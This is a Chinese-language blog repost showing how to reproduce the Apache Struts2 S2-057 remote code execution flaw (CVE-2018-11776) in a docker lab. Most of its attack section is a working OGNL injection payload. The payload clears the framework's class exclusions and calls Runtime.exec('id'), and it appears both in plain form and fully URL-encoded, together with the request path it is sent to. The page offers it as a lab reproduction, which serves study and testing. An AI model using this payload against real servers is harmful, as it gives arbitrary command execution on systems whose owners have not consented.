1. 首页
  2. 文章中心
  3. 安全

远程代码执行漏洞(CVE-2018-11776)影响版本环境搭建漏洞利用

66 阅读 0 评论
我是靠谱客的博主 等待金鱼,最近开发中收集的这篇文章主要介绍远程代码执行漏洞(CVE-2018-11776)影响版本环境搭建漏洞利用,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

影响版本

Struts <= Struts 2.3.34, Struts 2.5.16

环境搭建

启动Struts 2.3.34环境:

docker-compose up -d

启动环境后,访问http://your-ip: 8080/show/,您将看到Struts2测试页面。

漏洞利用

利用

 

S2-057要求具备以下条件:

 

 

action元素没有设置名称空间属性,或者使用了通配符

 

名称空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞。

 

有效载荷:

花括号进行url编码

http://your-ip:8080/$%7B1+1%7D/actionChain1.action

可以发现我们的一加一算法得出结果了

使用来自S2-057漏洞分析和POC的有效载荷:

${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

进行url编码

%24%7b%0a%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%63%74%3d%23%72%65%71%75%65%73%74%5b%27%73%74%72%75%74%73%2e%76%61%6c%75%65%53%74%61%63%6b%27%5d%2e%63%6f%6e%74%65%78%74%29%2e%28%23%63%72%3d%23%63%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%75%3d%23%63%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%2e%28%23%61%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%69%64%27%29%29%2e%28%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%23%61%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%7d

id命令进行了执行

 

最后

以上就是等待金鱼为你收集整理的远程代码执行漏洞(CVE-2018-11776)影响版本环境搭建漏洞利用的全部内容,希望文章能够帮你解决远程代码执行漏洞(CVE-2018-11776)影响版本环境搭建漏洞利用所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(44)

相关文章

Struts2反序列化漏洞
Struts2反序列化漏洞
Struts2 S2-057远程执行代码漏洞(CVE-2018-11776)漏洞复现 漏洞防御
Struts2 S2-057远程执行代码漏洞(CVE-2018-11776)漏洞复现 漏洞防御
Apache struts2 namespace远程命令执行CVE-2018-11776(S2-057)漏洞复现
Apache struts2 namespace远程命令执行CVE-2018-11776(S2-057)漏洞复现
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-057(CVE-2018-11776)???? 博主介绍
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-057(CVE-2018-11776)???? 博主介绍
远程代码执行漏洞(CVE-2018-11776)影响版本环境搭建漏洞利用
远程代码执行漏洞(CVE-2018-11776)影响版本环境搭建漏洞利用
Apache Struts2高危漏洞(S2-057CVE-2018-11776)
Apache Struts2高危漏洞(S2-057CVE-2018-11776)
使用IAST工具Semmle QL发现CVE-2018-11776安全漏洞过程(转)
使用IAST工具Semmle QL发现CVE-2018-11776安全漏洞过程(转)
struts2 代码执行(CVE-2018-11776)漏洞复现 vulfocus夺旗
struts2 代码执行(CVE-2018-11776)漏洞复现 vulfocus夺旗

评论列表共有 0 条评论

立即
投稿
返回
顶部